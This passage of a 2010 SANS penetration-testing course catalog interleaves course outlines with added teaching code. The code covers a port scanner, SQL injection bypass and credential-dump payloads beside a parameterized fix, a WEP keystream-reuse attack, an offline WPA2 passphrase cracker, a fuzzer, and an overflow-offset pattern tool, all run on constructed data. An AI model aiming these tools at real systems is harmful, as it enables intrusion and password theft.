Topics: Comprehensive Metasploit Framework Coverage with Exploits/Stagers/Stages; Bypassing the Shell vs. Terminal Dilemma; Installing VNC/RDP/SSH with Only Shell Access; Running Windows Commands Remotely with sc and wmic; Building Port Scanners and Password Guessers at the Command Line

560.4 Hands On: Password Attacks*
This component turns our attention to password attacks, analyzing password guessing, password cracking, and pass-the-hash techniques in depth. We’ll go over numerous tips based on real-world experience to help penetration testers and ethical hackers maximize the effectiveness of their password attacks with some of the most powerful attack tools available today for gaining access to machines.
Topics: Pass-the-Hash Attacks Using Modified SMB Client Software; Patching John the Ripper to Squeeze Out Maximum Performance; Rainbow Tables Hands-on and In-depth; Cain – The Pen Tester’s Dream Tool

560.5 Hands On: Wireless and Web Apps*
This section describes methodologies for finding common wireless weaknesses, including misconfigured access points, application of weak security protocols, and the improper configuration of stronger security technologies. The second half focuses on Web application pen testing, looking for the flaws that impact commercial and homegrown Web apps. Attendees will work hands-on with tools that can find Cross-Site Scripting (XSS), Cross-Site Request Forgery (XSRF), command injection, and SQL injection flaws, experimenting with each in several exercises.
Topics: Wireless Attacks; Discovering Access Points (Wire-Side and Wireless-Side); Wireless Crypto Flaws; Client-Side Wireless Attacks; Cross-Site Scripting; Cross-Site Request Forgery; SQL Injection; Leveraging SQL Injection to Perform Command Injection

560.6 Hands On: Penetration Testing Workshop and Capture the Flag Event*
This lively session represents the culmination of the network penetration testing and ethical hacking course, where attendees apply the skills mastered in the other sessions in a hands-on workshop. The rest of the course covers the overall process for successful testing with a series of hands-on exercises individually illustrating each point. But in this final workshop, all of the exercises converge in an overall network penetration-testing workout, where attendees will function as part of a pen test team.
Topics: Applying Penetration Testing and Ethical Hacking Practices End-to-end; Scanning; Exploitation; Pivoting; Analyzing Results

SANS Faculty Fellow: Ed Skoudis
Ed Skoudis is a founder and senior security consultant with InGuardians. Ed’s expertise includes hacker attacks and defenses, the information security industry, and computer privacy issues, with over fifteen years of experience in information security. Ed authored and regularly teaches the SANS courses on network penetration testing (SEC560) and incident response (SEC504), helping over three thousand information security professionals each year improve their skills and abilities to defend their networks. He has performed numerous security assessments; conducted exhaustive anti-virus, anti-spyware, Virtual Machine, and IPS research; and responded to computer attacks for clients in financial, high technology, healthcare, and other industries. Ed conducted a demonstration of hacker techniques against financial institutions for the United States Senate and is a frequent speaker on issues associated with hacker tools and defenses. He has published numerous articles on these topics as well as the Prentice Hall best sellers Counter Hack Reloaded and Malware: Fighting Malicious Code. Ed was also awarded 2004-2009 Microsoft MVP awards for Windows Server Security and is an alumnus of the Honeynet Project. Previous to InGuardians, Ed served as a security consultant with International Network Services (INS), Global Integrity, Predictive Systems, SAIC, and Bell Communications Research (Bellcore). Ed also blogs about command line tips at http://blog.commandlinekungfu.com.

*This course is available to Security 560 participants only.
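The 560.3 topic “Building Port Scanners and Password Guessers at the Command Line” is easier to appreciate with a concrete scanner in hand. What follows is an added example, not SANS course material or any SANS tool: a threaded TCP connect scanner with banner grabbing. To run offline it starts two throwaway listeners on 127.0.0.1 (the SSH banner string and the port numbers are constructed for the demo); for real use point scan_ports at a target and a port list such as TOP_PORTS, within your rules of engagement.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

# Added example: TCP connect scan with banner grab. Not SANS course code.
TOP_PORTS = [21, 22, 23, 25, 80, 110, 139, 143, 443, 445, 3389]


def connect_scan(host, port, timeout=0.5):
    """Complete the TCP handshake, then read whatever the service volunteers.
    Returns (port, is_open, banner)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                banner = s.recv(128).decode("ascii", "replace").strip()
            except OSError:          # service waits for the client to speak first
                banner = ""
            return port, True, banner
    except OSError:                  # refused, timed out or unreachable
        return port, False, ""


def scan_ports(host, ports, workers=32):
    """Scan in parallel; returns {open_port: banner}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: connect_scan(host, p), ports))
    return {port: banner for port, is_open, banner in results if is_open}


def start_banner_listener(banner):
    """Throwaway local service for the offline demo (constructed, not a real daemon)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))       # port 0: let the OS pick a free port
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listener closed, stop serving
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return srv


def demo():
    """Two open ports (one chatty, one silent) plus one port known to be closed."""
    ssh = start_banner_listener(b"SSH-2.0-OpenSSH_5.3\r\n")   # constructed banner
    silent = start_banner_listener(b"")
    open_ports = [ssh.getsockname()[1], silent.getsockname()[1]]
    probe = socket.socket()
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()                    # nothing listens here any more
    found = scan_ports("127.0.0.1", open_ports + [closed_port])
    ssh.close()
    silent.close()
    return open_ports, closed_port, found


if __name__ == "__main__":
    for port, banner in sorted(demo()[2].items()):
        print(f"{port}/tcp open  {banner}")
```

A connect scan completes the handshake, so it shows up in the target's logs; that is acceptable on an authorized test and is exactly what the Nmap -sT scan in 560.2 does. The banner is only what the service offers unprompted, which is why version scanning (560.2) sends protocol-specific probes instead.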
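The SQL injection topics in 542.5 (interacting with the server through SQL injection) and 560.5 (SQL injection, and leveraging it for command injection) come down to one mistake: attacker-supplied text becomes part of the SQL grammar. This added example, which is not course material, puts a vulnerable login query beside its parameterized fix and runs both against an in-memory SQLite table; the schema, rows, credentials and payload strings are constructed for the demo.

```python
import sqlite3

# Added example: vulnerable vs. parameterized login query. Not SANS course code.
# Schema, rows and credentials below are constructed for the demo.


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw TEXT, is_admin INTEGER)")
    db.executemany("INSERT INTO users (name, pw, is_admin) VALUES (?, ?, ?)",
                   [("alice", "Winter2010!", 1), ("bob", "hunter2", 0)])
    return db


def login_vulnerable(db, user, pw):
    """String formatting splices attacker text into the SQL grammar."""
    sql = "SELECT name FROM users WHERE name = '%s' AND pw = '%s'" % (user, pw)
    return [row[0] for row in db.execute(sql)]


def login_safe(db, user, pw):
    """Bound parameters travel as data; the statement shape cannot change."""
    sql = "SELECT name FROM users WHERE name = ? AND pw = ?"
    return [row[0] for row in db.execute(sql, (user, pw))]


# Payloads a tester would try against the vulnerable form (constructed):
BYPASS = "alice' -- "      # the comment swallows the password check
DUMP = "x' UNION SELECT name || ':' || pw FROM users -- "   # login becomes a data channel


def auth_bypass(db):
    return login_vulnerable(db, BYPASS, "wrong-password")


def dump_credentials(db):
    return login_vulnerable(db, DUMP, "irrelevant")


if __name__ == "__main__":
    db = make_db()
    print("bypass  :", auth_bypass(db))
    print("dump    :", dump_credentials(db))
    print("hardened:", login_safe(db, BYPASS, "wrong-password"))
```

The UNION payload is the “interacting with the server” step: the same channel returns any table the application account can read. On Microsoft SQL Server the channel also reaches stored procedures such as xp_cmdshell, which is the command-injection escalation 560.5 lists; SQLite has no such procedure, so this demo stops at data extraction. The fix is the same in every case: the parameterized form, never string concatenation.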
SECURITY 617
Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010 • 9:00am - 5:00pm
36 CPE Credits • Laptop Required • Instructor: Joshua Wright

Who Should Attend
• Ethical Hackers and Penetration Testers
• Network Security Staff
• Network and System Administrators
• Incident Response Teams
• Information Security Policy Decision Makers
• Technical Auditors
• Information Security Consultants
• Wireless System Engineers
• Embedded Wireless System Developers

Despite the security concerns many of us share regarding wireless technology, it is here to stay. In fact, not only is wireless here to stay, but it is growing in deployment and utilization, not only with wireless LAN technology and WiFi, but also for other applications including cordless telephones, smart homes, embedded devices, and more. Technologies such as ZigBee and WiMAX offer new methods of connectivity to devices, while other wireless technologies including WiFi, Bluetooth, and DECT continue their massive growth rate, each introducing their own set of security challenges and attacker opportunities.

To be a wireless security expert, you need to have a comprehensive understanding of the technology, the threats, the exploits, and the defense techniques along with hands-on experience in evaluating and attacking wireless technology. Not limiting your skill-set to WiFi, you’ll need to evaluate the threat from other standards-based and proprietary wireless technologies as well. This course takes an in-depth look at the security challenges of many different wireless technologies, exposing you to wireless security threats through the eyes of an attacker. Using readily available and custom-developed tools, you’ll navigate your way through the techniques attackers use to exploit WiFi networks, including attacks against WEP, WPA/WPA2, PEAP, TTLS, and other systems, including developing attack techniques leveraging Windows 7 and Mac OS X. We’ll also examine the commonly overlooked threats associated with Bluetooth, ZigBee, DECT, and proprietary wireless systems. As part of the course, you’ll receive the SWAT Toolkit, which will be used in hands-on labs to back up the course content and reinforce wireless ethical hacking techniques.

Using assessment and analysis techniques, this course will show you how to identify the threats that expose wireless technology and build on this knowledge to implement defensive techniques that can be used to protect wireless systems.

The SWAT Toolkit consists of:
• USB Global Positioning System (GPS) adapter
• All software and tools used in lab exercises, based on Backtrack 4

In terms of technical content, this course ranks up at the top for in-depth, comprehensive information about wireless security. However, you don’t need to be an expert in wireless technology to succeed in this course. To help students consume the course content, I’ve written extensive notes for every topic, complete with review question and answer sections and recommendations for additional reading if you want to dig deeper. Many students comment that their favorite part about the course is the hands-on time, which makes up a significant part of the course. Classroom labs are written such that even if you have never used wireless technology or a Linux system before, you’ll be able to complete all exercises, and reproduce your results against your own networks when you return to the office. Combined with the excellent SANS instructors, everyone can take this class and gain useful and valuable skills for attacking and defending wireless networks.

AUTHOR STATEMENT
It’s been amazing to watch the progression of wireless technology over the past several years. WiFi has grown in maturity and offers strong authentication and encryption options to protect networks, and many organizations have migrated to this technology. At the same time, attackers are becoming more sophisticated, and we’ve seen significant system breaches netting millions of payment cards that start with a wireless exploit. This pattern has me very concerned, as many organizations, even after deploying WPA2 and related technology, remain vulnerable to a number of attacks that expose their systems and internal networks. In putting this class together, I wanted to help organizations recognize the multi-faceted wireless threat landscape and evaluate their exposure through ethical hacking techniques. Moreover, I wanted my students to learn critical security analysis skills so that, while we focus on evaluating wireless systems, the vulnerabilities and attacks we leverage to exploit these systems can be applied to future technologies as well. In this manner, the skills you build in this class remain valuable for today’s wireless technology, tomorrow’s technology advancements, and for other complex systems you have to evaluate in the future as well. If you have questions or comments about this course, I would be very happy to hear from you. Please e-mail me at jwright@sans.org.
-Joshua Wright

Wireless Ethical Hacking, Penetration Testing, and Defenses
After completing this course, students will be prepared to evaluate and critique the security of wireless networks. Using auditing and penetration-testing techniques, students will be able to demonstrate wireless security flaws and build a clear assessment of the risks associated with a specific deployment. Using this information, students will be able to design a secure wireless network that addresses the challenges of wireless technology.

617.1 Wireless Architecture and Analysis*
Students will identify the risks associated with modern wireless deployments as well as the characteristics of physical layer radio frequency systems, including 802.11a/b/g and pre-802.11n systems. Students will leverage open-source tools for analyzing wireless traffic and mapping wireless deployments.
Topics: Wireless Signal Exposure Threats; Identifying Threats in Wireless Networks; RF Signal Propagation and Transmission Characteristics; RF Antenna Gain Types and Concepts; Physical Layer Coding Mechanisms; Leveraging Tools Including Kismet, Wireshark, and gpsmap for Network Mapping and Identification

617.2 Hands On – Part 1: Wireless Security Exposed*
Students will develop an in-depth understanding of the IEEE 802.11 MAC layer and its operating characteristics. Using passive and active assessment techniques, students will evaluate deployment and implementation weaknesses, auditing against common implementation requirements, including PCI and the DoD Directive 8100.2. Security threats introduced with rogue networks will be examined from a defensive and penetration-testing perspective. Threats present in wireless hotspot networks will also be examined, identifying techniques attackers can use to manipulate guest or commercial hotspot environments.
Topics: IEEE 802.11 Framing; AP Fingerprinting; Kismet Post-Processing; Assessing Information Disclosure Threats; Auditing Wireless Policy Compliance; Evading WIDS Systems with Custom Rogue APs; “Free Public WiFi” and Ad-Hoc Networks; Wireless Device Triangulation; Webmail Session Hijacking; Defensive Measures for Guest Network Deployment

617.3 Hands On – Part 2: Wireless Security Exposed*
Students will continue their assessment of wireless security mechanisms, such as the identification and compromise of static and dynamic WEP networks and exploiting weak authentication techniques, including the Cisco LEAP protocol. Next-generation wireless threats will be assessed, including attacks against client systems, such as network impersonation attacks and traffic manipulation. Students will evaluate the security and threats associated with common wireless MAN technology, including proprietary and standards-based solutions.
Topics: Introduction to The RC4 Cipher; Understanding Failures in WEP; Leveraging Advanced Tools to Accelerate WEP Cracking; Attacking MS-CHAPv2 Authentication Systems; Attacker Opportunities When Exploiting Client Systems; Manipulating Plaintext Network Traffic; Attacking the Preferred Network List on Client Devices; Network Impersonation Attacks; Risks Associated with WMAN Technology; Assessing WiMAX Flaws

617.4 Hands On – Part 3: Wireless Security Exposed*
Part three covers the evaluation of modern wireless encryption and authentication systems, identifying the benefits and flaws in WPA/WPA2 networks and common authentication systems. Upper-layer encryption strategies for wireless security using IPSec are evaluated, along with in-depth coverage of denial-of-service attacks and techniques.
Topics: Threats Associated with the WPA/TKIP Protocol; Implementing Offline Wordlist Attacks Against WPA/WPA2-PSK Networks; Understanding the PEAP Authentication Exchange; Exploiting PEAP Through RADIUS Impersonation; Recommendations for Securing Windows XP Supplicants; Exploiting Wireless Firmware for DoS Attack; Wireless Packet Injection and Manipulation Techniques; VPN Network Fingerprinting and Analysis Tools

617.5 Hands On – Part 4: Wireless Security Exposed*
Advanced wireless testing and vulnerability discovery systems will be covered, including 802.11 fuzzing techniques. A look at other wireless technology, including proprietary systems and cellular technology, and in-depth coverage of Bluetooth risks will demonstrate the risks associated with other forms of wireless systems and their impact on organizations.
Topics: Wireless Fuzzing Tools and Techniques; Vulnerability Disclosure Strategies; Discovering Unencrypted Video Transmitters; Assessing Proprietary Wireless Devices; Traffic Sniffing in GSM Networks; Attacking SMS Messages and Cellular Calls; Bluetooth Authentication and Pairing Exchange; Attacking Bluetooth Devices; Sniffing Bluetooth Networks; Eavesdropping on Bluetooth Headsets

617.6 Wireless Security Strategies and Implementation*
The final day of the course evaluates strategies and techniques for protecting wireless systems. Students will examine the benefits and weaknesses of WLAN IDS systems while gaining insight into the design and deployment of a public key infrastructure (PKI). Students will also examine critical secure network design choices, including the selection of an EAP type, selecting an encryption strategy, and the management of client configuration settings.
Topics: WLAN IDS Signature and Anomaly Analysis Techniques; Understanding PKI Key Management Protocols; Deploying a Private Certificate Authority on Linux and Windows Systems; Configuring Windows IAS for Wireless Authentication; Configuring Windows XP Wireless Settings in Login Scripts

Senior Instructor: Joshua Wright
Joshua Wright is a senior security analyst with InGuardians, LLC and a senior instructor with the SANS Institute. A widely recognized expert in the wireless security field, Josh has worked with private and government organizations to evaluate the threat surrounding wireless technology. As an open-source enthusiast, Josh has developed a variety of tools that can be leveraged for penetration testing and security analysis. Prior to joining InGuardians, Josh was the senior security researcher for Aruba Networks, leading a team committed to significantly improving the security of modern networks. In his spare time, Josh looks for any opportunity to void the warranty on wireless electronics. Wright maintains a popular blog at http://legal-beagle.typepad.com.

“Josh’s passion for wireless comes through in this course. His knowledge is second to none and his desire to freely share this information is truly impressive.”
-CURTIS WISEMAN, AMBIR SOLUTIONS

*This course is available to Security 617 participants only.
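The 617.3 topics “Introduction to The RC4 Cipher” and “Understanding Failures in WEP” are shown here in code. This is an added example, not course material: a from-scratch RC4, the WEP per-packet key (24-bit IV prepended to the shared key), and the consequence of a reused IV. One frame whose plaintext is known (every 802.11 data frame starts with the same LLC/SNAP header, and an ARP request makes more bytes predictable) yields the keystream for that IV, which then decrypts any other frame sent under it, without ever recovering the shared key. The WEP key, IV and frame contents are constructed.

```python
import math

# Added example: RC4 and the WEP keystream-reuse failure. Not SANS course code.


def rc4_keystream(key, length):
    """Key-scheduling (KSA) then pseudo-random generation (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4(key, data):
    """RC4 is a stream cipher: encryption and decryption are the same XOR."""
    return bytes(d ^ k for d, k in zip(data, rc4_keystream(key, len(data))))


def wep_encrypt(iv, shared_key, plaintext):
    """WEP's per-packet RC4 key is IV || shared key; the 24-bit IV goes on
    the wire in the clear in front of the ciphertext."""
    assert len(iv) == 3
    return iv + rc4(iv + shared_key, plaintext)


def recover_keystream(frame, known_plaintext):
    """Known plaintext for one frame gives the keystream for its IV."""
    return bytes(c ^ p for c, p in zip(frame[3:], known_plaintext))


def decrypt_with_keystream(keystream, frame):
    """Any other frame under the same IV falls to the recovered keystream."""
    return bytes(c ^ k for c, k in zip(frame[3:], keystream))


def iv_collision_probability(frames, iv_bits=24):
    """Birthday bound: chance that at least one IV repeats after n frames."""
    n, space = frames, 2 ** iv_bits
    return 1 - math.exp(-n * (n - 1) / (2 * space))


# LLC/SNAP header (AA AA 03 00 00 00) + EtherType 0x0806 + start of an ARP request:
# bytes an attacker can assume without seeing any plaintext.
LLC_SNAP_ARP = b"\xaa\xaa\x03\x00\x00\x00\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01"


def demo_keystream_reuse():
    shared_key = b"S3cretWEPkey!"        # constructed 104-bit WEP key
    iv = b"\x00\x0c\x9a"                 # constructed IV, reused by the second frame
    frame_arp = wep_encrypt(iv, shared_key, LLC_SNAP_ARP)
    secret = b"\xaa\xaa\x03\x00\x00\x00\x08\x00GET /admin?pw=hunter2"   # constructed
    frame_secret = wep_encrypt(iv, shared_key, secret)
    ks = recover_keystream(frame_arp, LLC_SNAP_ARP)    # attacker never learns shared_key
    return decrypt_with_keystream(ks, frame_secret)


if __name__ == "__main__":
    print(demo_keystream_reuse())
    print(f"P(IV repeat after 5000 frames) = {iv_collision_probability(5000):.2f}")
```

The recovered bytes are only as long as the known plaintext, which is why WEP attackers prefer to replay or forge ARP traffic: it is both predictable and plentiful. iv_collision_probability shows the other half of the failure: with a 24-bit IV space a busy access point has better than even odds of repeating an IV after roughly 5,000 frames, before the related-key weaknesses that the accelerated cracking tools in 617.3 exploit even come into play.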
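For the 617.4 topic “Implementing Offline Wordlist Attacks Against WPA/WPA2-PSK Networks”, this added example (not course material, and not aircrack-ng's code) walks the derivation a cracker repeats for every candidate passphrase: PBKDF2 to the PMK, the PRF-512 expansion to the PTK, and the EAPOL-Key MIC check against message 2 of the 4-way handshake. The “captured” handshake is constructed by generating it with a known passphrase; the MAC addresses, nonces and EAPOL frame bytes are stand-ins rather than a byte-accurate capture.

```python
import hashlib
import hmac

# Added example: offline wordlist attack against WPA2-PSK. Not SANS course
# code and not aircrack-ng; the "capture" is constructed in build_handshake().


def pmk_from_passphrase(passphrase, ssid):
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).
    Those 4096 rounds are the per-candidate cost every cracker pays."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512 over "Pairwise key expansion"; min/max ordering lets both sides
    derive the same PTK. CCMP uses the first 48 bytes (KCK, KEK, TK)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return ptk[:64]


def eapol_mic(kck, eapol_frame_mic_zeroed):
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 truncated to 16 bytes
    over the EAPOL-Key frame with its MIC field set to zero."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack(handshake, wordlist):
    """PMK -> PTK -> KCK per candidate; a matching MIC proves the passphrase."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, handshake["ssid"])
        ptk = ptk_from_pmk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                           handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], handshake["eapol"]), handshake["mic"]):
            return candidate
    return None


def build_handshake(passphrase, ssid="CorpWiFi"):
    """Constructed stand-in for a sniffed 4-way handshake: the fields a cracker
    needs (SSID, both MACs, ANonce, SNonce, the message-2 EAPOL frame with MIC
    zeroed, and the MIC the supplicant sent). Not a byte-accurate frame."""
    ap_mac = bytes.fromhex("001122334455")
    sta_mac = bytes.fromhex("66778899aabb")
    anonce = hashlib.sha256(b"constructed anonce").digest()
    snonce = hashlib.sha256(b"constructed snonce").digest()
    eapol = bytes.fromhex("0103007502010a00000000000000000001") + snonce + b"\x00" * 72
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(ptk[:16], eapol)}


if __name__ == "__main__":
    hs = build_handshake("Winter2010!")      # the "victim's" passphrase (constructed)
    print(crack(hs, ["password", "letmein", "Winter2010!", "hunter2"]))
```

Nothing here needs the access point: once messages 1 and 2 (or 2 and 3) of the handshake are captured, the attack is entirely offline and limited only by wordlist quality and PBKDF2 throughput. Because the SSID is the PBKDF2 salt, PMKs can be precomputed per SSID, which is why common network names are a weakness in themselves and why a long random passphrase, or EAP-based authentication as covered in 617.6, is the defense.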
SECURITY 709
Six-Day Program • Mon, Sept 20 - Sat, Sept 25, 2010 • 9:00am - 5:00pm
39 CPE Credits • Evening Bootcamp Sessions: 5:00pm - 7:00pm (Days 2-4)
Laptop Required • Instructor: Stephen Sims

Who Should Attend
• Incident handlers looking to take the next step in understanding exploitation in its most technical form
• Network and system security professionals looking to understand the methods used to write exploit code and discover vulnerabilities
• Programmers and code review engineers looking to understand the threat of exploitation and how to write Proof of Concept (POC) code to demonstrate exploitation techniques
• Certification-holders looking to improve and put their practical knowledge to the test
• Anyone looking to build credibility and take a technical course on advanced hacking techniques

Zero-day vulnerabilities are being discovered more frequently, and malicious computer attackers are constantly trying to exploit them.

But when a new flaw is discovered, it is often difficult to determine whether it is truly exploitable, making an analysis of business risk difficult, if not impossible. Things get even murkier when the flaw is discovered in home-grown applications supporting an enterprise. Yet until now, only a small, self-selected, high-tech “priesthood” of security researchers have had the skills to determine whether a given flaw can lead directly to exploitation.

Do you want to join the skilled security researcher elite and stop relying on others to find your application’s vulnerabilities and start writing your own Proof of Concept (POC) code? Do you want the skills to be part of the security researcher “priesthood”?

“Provides an interactive avenue for learning new material and building lasting relationships.”
-JASON COLEMAN, LRN CORP.

In this course we bridge the gaps and take a step-by-step look at Linux and Windows operating systems and how exploitation truly works under the hood. The course rapidly progresses through exploitation techniques used to attack stacks, heaps, and other memory segments on Linux and Windows. This is a fast-paced course that provides you with the skills to hit the ground running with vulnerability research. We end the course with a Capture the Flag (CTF) exercise requiring you to discover and exploit vulnerabilities on remote systems.

Attendees can apply the skills developed in this class to create and customize exploits for penetration tests of homegrown software applications and newly discovered flaws in widespread commercial software. Understanding the process of exploit development can help enterprises analyze their actual business risks better than the ambiguous hypotheticals we often contend with in most traditional vulnerability assessments.

This course is not for the faint of heart or those with modest skills. It provides leading-edge skills for the best technical security professionals, security researchers, and pen testers. If you are able to absorb it, the knowledge gained throughout the course will help you write custom exploits to gain privileged system access and determine the real risk to your business. Precompiled exploits won’t help you here!

AUTHOR STATEMENT
As a perpetual student of information security, I am excited to offer this course documenting the steps I took when diving head first into exploitation and writing Proof of Concept (POC) code. In all of my years focusing on these topics, I found many holes and unanswered questions. With this course I aim to bridge the gap between the daily practice of security engineering and the advanced world of security research and hacking. Attackers are always one step ahead and are relying on our tendency to become complacent with controls we work so hard to deploy. If you find this topic as fascinating as I do, I look forward to seeing you soon!
- Stephen Sims
709.1 Fuzzing for Bug Discovery*
Day one is a hands-on fuzzing day where we’ll examine the methods, techniques, and tools behind the use of fuzzing for vulnerability analysis. Credited for identifying numerous vulnerabilities in software ranging from Cisco routers to the Windows RPC service, fuzzing is an important component of software testing. We’ll quickly introduce the operational aspects of fuzzing and focus the day on how you can leverage these techniques in your organization as a penetration tester, developer, QA engineer, or information security engineer, complete with case studies of fuzzing success stories. This is followed by the use of fuzzing tools and custom frameworks to test any service or file format for flaws, including several hands-on exercises against live systems.
Topics: Establishing a Target Environment; Monitoring and Fault Identification Techniques; Designing Fuzzing Test Cases; Quick-Start with Mutation-Based Fuzzing; Targeting Protocol Behavior for Improved Results; Building a Custom Fuzzer Using the Sulley Framework; Leveraging Sulley for Post-Mortem Analysis; File Format Fuzzing
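To make the 709.1 pieces concrete (target environment, monitoring and fault identification, test-case design, mutation-based fuzzing, file-format fuzzing), here is an added example that is not course material and not the Sulley framework: a mutation-based fuzzer whose monitor separates expected input rejection from genuine faults and deduplicates crashes by signature. The target, a parser for a toy palette-image format with a deliberately unchecked palette index, and the seed file are constructed for the demo.

```python
import random
import struct
import traceback

# Added example: mutation-based fuzzer with fault monitoring. Not SANS course
# code and not the Sulley framework. Target format, bug and seed are constructed.

MAGIC = b"PI"


def parse_image(data):
    """Toy format: magic(2) width(2) height(2) ncolors(1) palette(3*ncolors) pixels(w*h).
    Validation failures raise ValueError (expected); anything else is a fault."""
    if data[:2] != MAGIC:
        raise ValueError("bad magic")
    if len(data) < 7:
        raise ValueError("truncated header")
    width, height, ncolors = struct.unpack("<HHB", data[2:7])
    pal_end = 7 + 3 * ncolors
    if len(data) < pal_end + width * height:
        raise ValueError("truncated body")
    palette = [tuple(data[i:i + 3]) for i in range(7, pal_end, 3)]
    pixels = data[pal_end:pal_end + width * height]
    # BUG (deliberate): pixel values are trusted as palette indexes -> out-of-bounds read
    return [palette[p] for p in pixels]


def make_seed():
    """A valid 4x2 two-colour image used as the mutation base (constructed)."""
    palette = b"\xff\x00\x00" + b"\x00\xff\x00"
    pixels = bytes([0, 1, 0, 1, 1, 0, 1, 0])
    return MAGIC + struct.pack("<HHB", 4, 2, 2) + palette + pixels


def mutate(data, rng):
    """One mutation per case: bit flip, boundary byte, truncation or chunk duplication."""
    buf = bytearray(data)
    pos = rng.randrange(len(buf))
    strategy = rng.randrange(4)
    if strategy == 0:
        buf[pos] ^= 1 << rng.randrange(8)
    elif strategy == 1:
        buf[pos] = rng.choice([0x00, 0x01, 0x7F, 0x80, 0xFF])
    elif strategy == 2:
        del buf[pos:]
    else:
        buf[pos:pos] = buf[pos:pos + rng.randrange(1, 8)]
    return bytes(buf)


def run_case(target, data):
    """Monitor: 'ok', 'rejected' (clean ValueError) or 'crash' with a dedup signature."""
    try:
        target(data)
        return "ok", None
    except ValueError:
        return "rejected", None
    except Exception as exc:
        frame = traceback.extract_tb(exc.__traceback__)[-1]
        return "crash", (type(exc).__name__, frame.name, frame.lineno)


def fuzz(target, seed, iterations, rng_seed=1):
    """Returns (outcome counts, {crash signature: first input that reproduced it})."""
    rng = random.Random(rng_seed)
    stats = {"ok": 0, "rejected": 0, "crash": 0}
    crashes = {}
    for _ in range(iterations):
        case = mutate(seed, rng)
        outcome, signature = run_case(target, case)
        stats[outcome] += 1
        if signature is not None and signature not in crashes:
            crashes[signature] = case
    return stats, crashes


if __name__ == "__main__":
    stats, crashes = fuzz(parse_image, make_seed(), 500)
    print(stats)
    for sig, case in crashes.items():
        print(sig, case.hex())
```

The monitor is the part that matters: a fuzzer that cannot tell “the parser said no” from “the parser fell over” drowns real faults in noise. In-process the fault signal is an unexpected exception; against a native service it is the debugger or crash handler that Sulley's process-monitor agent wraps, and the signature becomes the faulting address rather than a Python frame. Keeping the first reproducing input per signature is what makes post-mortem analysis (the next 709.1 topic) possible.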

709.2 Linux Memory and Stack Exploitation*
Day two begins with an important framework that will allow us to progress quickly. We walk through the world of x86 processors, assembly, and memory layout. This is followed by diving head first into stack-based overflows. Much of the focus is on methods used to bypass OS and compile-time controls, such as Write XOR Execute (Data Execution Prevention), Stack Canaries, and Address Space Layout Randomization (ASLR).
Topics: Stack and Dynamic Memory Management and Allocation on the Linux OS; Disassembling a Binary and Analyzing x86 Assembly Code; Performing Symbol Resolution on the Linux OS; Identifying and Analyzing Basic Stack-based Overflows on the Linux OS; Performing Return-to-libc (ret2libc) Attacks on the Stack; Defeating Stack Protection on the Linux OS; Defeating ASLR on the Linux OS
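A step that 709.2 and 709.4 both rely on, finding exactly which bytes of an overflowing input land on the saved return address (or the SEH record), is shown in this added example; it is not course material, and it imitates the Metasploit pattern_create/pattern_offset scheme rather than calling those tools. The victim with a 64-byte buffer and 8 bytes of saved frame is constructed; against a real target the pattern is sent to the program under a debugger and the faulting EIP is read from there.

```python
import struct

# Added example: cyclic pattern for locating the return-address overwrite.
# Not SANS course code; mimics Metasploit's pattern_create/pattern_offset.

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"


def pattern_create(length):
    """'Aa0Aa1Aa2...': no 4-byte window repeats within the first 20,280 bytes,
    so any 4 bytes read back from a register identify a unique offset."""
    chunks = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGIT:
                chunks.append(u + l + d)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length].encode()
    return "".join(chunks)[:length].encode()


def pattern_offset(pattern, value, width=4):
    """value: the register as the debugger prints it (an int; little-endian in
    memory) or the raw bytes seen in a dump. Returns the byte offset into the
    input, or -1 if those bytes did not come from the pattern."""
    needle = value.to_bytes(width, "little") if isinstance(value, int) else value[:width]
    return pattern.find(needle)


def simulate_overflow(payload, buffer_size=64, saved_frame=8):
    """Constructed victim: strcpy into a 64-byte stack buffer, 8 bytes of saved
    frame, then the saved return address. Returns the 'EIP' value the debugger
    would show at the crash, or None if the payload never reaches it."""
    ret_at = buffer_size + saved_frame
    if len(payload) < ret_at + 4:
        return None
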